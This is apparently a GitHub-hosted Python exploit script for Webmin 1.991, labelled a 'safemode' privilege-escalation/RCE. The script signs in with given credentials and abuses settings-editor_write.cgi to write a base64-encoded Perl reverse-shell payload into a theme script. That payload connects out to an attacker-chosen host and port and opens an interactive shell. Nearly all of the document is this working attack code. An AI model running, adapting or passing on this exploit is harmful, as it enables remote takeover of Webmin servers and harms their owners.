Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
#!/usr/bin/python3
# Webmin version 1.991
# "safemode" user privesc / RCE V1s3r1on & esp0xdeadbeef
# Thanks to Raj Chowdhury for supressing errors in the https certs
import requests
import random
import os
import base64
import warnings
s = requests.Session()
warnings.filterwarnings('ignore')
def go_to_homepage(url):
r = s.get(url, verify = False)
return r.text
def sign_in(url, username, password):
credentials = {
"user":username,
"pass":password
}
headers = {
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
}
r = s.post(
f"{url}/session_login.cgi",
data = credentials,
verify=False,
cookies = {}
)
cookies = {
'sid': s.cookies['sid']
}
return r.text, cookies
def navigate_to_theme(url, r, sid):
headers = {
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Referer" : f"{url}/",
"Origin" : url,
"X-Pjax-Url" : f"{url}/tconfig.cgi",
"X-Pjax-Container" : "[data-dcontainer]",
"X-No-Links" : "1",
"X-Requested-With" : "XMLHttpRequest"
}
cookies = {'sid': sid}
r = s.post(f"{url}/tconfig.cgi", verify=False)
return r.text
def reverse_shell(url, cookies, target_ip = 'localhost', target_port = 4444):
payload_str = '''perl -e 'use Socket;$i="''' + str(target_ip) + '''";$p=''' + str(target_port) + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};' '''
payload = 'system("echo ' + base64.b64encode(payload_str.encode()).decode() + ' | base64 -d | sh")'
print(f'writing payload: \n{payload}')
headers = {'Referer': url}
# the file location could be an arbitrary file write (think about a backdoor or something like this).
multipart_form_data = {
"file": '/etc/webmin/authentic-theme/scripts.pl',
'data': payload
}
with s.post(
url=f'{url}/settings-editor_write.cgi',
headers = headers,
cookies = cookies,
files=multipart_form_data,
allow_redirects=False
) as r:
if r.status_code == 302:
return 'exploit was succesfull'
else:
return 'exploit was failed'
def main():
go_to_homepage(url)
result, cookies = sign_in(url, username,password)
print(reverse_shell(url, cookies, target_ip=rev_host, target_port=rev_port))
sign_in(url, username,password)
def parse_args():
import argparse
parser = argparse.ArgumentParser(prog="python3 exloit.py")
parser.add_argument(
'-u','--url',
required=True,
type=str,
default="http://localhost:10000"
)
parser.add_argument(
'-pw','--password',
required=True,
type=str,
default='TestUser'
)
parser.add_argument(
'-un','--username',
required=True,
type=str,
default='Testing123!@#'
)
parser.add_argument(
'-rh','--revhost',
required=True,
type=str,
default='localhost'
)
parser.add_argument(
'-rp','--revport',
required=True,
type=int,
default=4444
)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
url = args.url
rev_host = args.revhost
rev_port = args.revport
username = args.username
password = args.password
main()